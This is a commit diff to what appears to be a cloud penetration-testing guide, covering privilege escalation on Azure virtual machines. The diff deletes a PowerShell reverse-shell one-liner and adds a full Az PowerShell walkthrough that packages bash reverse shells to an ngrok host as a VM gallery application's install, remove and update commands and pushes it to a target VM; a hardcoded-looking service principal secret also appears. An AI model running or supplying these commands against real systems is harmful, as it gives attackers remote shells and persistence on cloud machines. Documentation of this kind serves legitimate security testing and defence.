fix

2025-12-30 22:50:43 -08:00 · 2025-05-01 16:25:15 +02:00
parent 2cf7ab9070
commit afef551baa
2 changed files with 104 additions and 6 deletions
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -232,11 +232,6 @@ export URL_PACKAGE=$(az storage blob generate-sas \
  --https-only \
  --full-uri \
  -o tsv)
-
-# Alternative commands for Powrhsell reverse shell
-## Note that this would be detected by Defender (but it's an extarting point)
-## Add in the install, remove and update commands
-echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
 ```

 {{#endtab }}
@@ -280,6 +275,109 @@ az vm application set \
   --name deleteme-win4 \
   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
   --treat-deployment-as-failure true
+
+# You can create a SAS URL from a blob with something like:
+export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
+export URL_PACKAGE=$(az storage blob generate-sas \
+  --account-name <acc-name> \
+  --container-name <container-name> \
+  --name <filename> \
+  --permissions r \
+  --expiry "$EXPIRY" \
+  --https-only \
+  --full-uri \
+  -o tsv)
+```
+
+{{#endtab }}
+
+{{#tab name="Az" }}
+
+```bash
+##### GET VM #####
+
+Get-AzVm
+# Check that location is "Central US", the gallery and app mUST be in the same location
+
+$vmName="vm-name"
+
+
+
+##### CREATE SAS TOKEN TO USE IN A USELESS BLOB #####
+
+$rg="rg-name"
+
+# Get and set storage account
+Get-AzStorageAccount
+
+$accountName = "account-name"
+
+# Get and set container inside the storage
+Get-AzStorageContainer -Context (Get-AzStorageAccount -name $accountName -ResourceGroupName $rg).context
+
+$containerName = "container-name"
+
+# Upload dummy file
+$key = (Get-AzStorageAccountKey -ResourceGroupName $rg -Name $accountName)[0].Value
+$ctx = New-AzStorageContext -StorageAccountName $accountName -StorageAccountKey $key
+echo "test" > /tmp/test.txt
+$blobName = "test.txt"
+Set-AzStorageBlobContent -File /tmp/test.txt -Container $containerName -Blob "$blobName" -Context $ctx
+
+# Generate SAS token
+$expiry = (Get-Date).ToUniversalTime().AddDays(1).ToString("yyyy-MM-ddTHH:mmZ")
+$sasToken = New-AzStorageBlobSASToken `
+  -Container $containerName `
+  -Blob $blobName `
+  -Permission r `
+  -ExpiryTime $expiry `
+  -FullUri `
+  -Context $ctx
+
+
+
+##### CREATE GALLERY AND APP #####
+
+$rg = "rg-name"
+$location = "Central US"
+$galleryName = "myGallery"
+$appName = "myReverseShellApp"
+$subscription="subscription-id"
+
+# Create gallery
+New-AzGallery -ResourceGroupName $rg -Name $galleryName -Location $location
+
+# Create app in gallery
+New-AzGalleryApplication `
+  -ResourceGroupName $rg `
+  -GalleryName $galleryName `
+  -Name $appName `
+  -Location $location `
+  -SupportedOSType Linux
+
+
+# Create app version
+$versionName = "1.0.2"
+## create ngrok listener
+
+New-AzGalleryApplicationVersion `
+  -ResourceGroupName $rg `
+  -GalleryName $galleryName `
+  -GalleryApplicationName $appName `
+  -Name $versionName `
+  -Location $location `
+  -PackageFileLink "$sasToken" `
+  -Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
+  -Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
+  -Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'"
+
+
+# Launch app
+$appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName"
+$app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId
+$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName
+Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app
+Update-AzVM -ResourceGroupName $rg -VM $vm
 ```

 {{#endtab }}
--- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
@@ -101,7 +101,7 @@ Connect-AzAccount -Credential $creds

 # Connect with access token
 Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken]
-# If connecting with some metadata token just use "-AccountId asdasd@example.com" and it will work
+# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token)

 # Connect with Service principal/enterprise app secret
 $password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force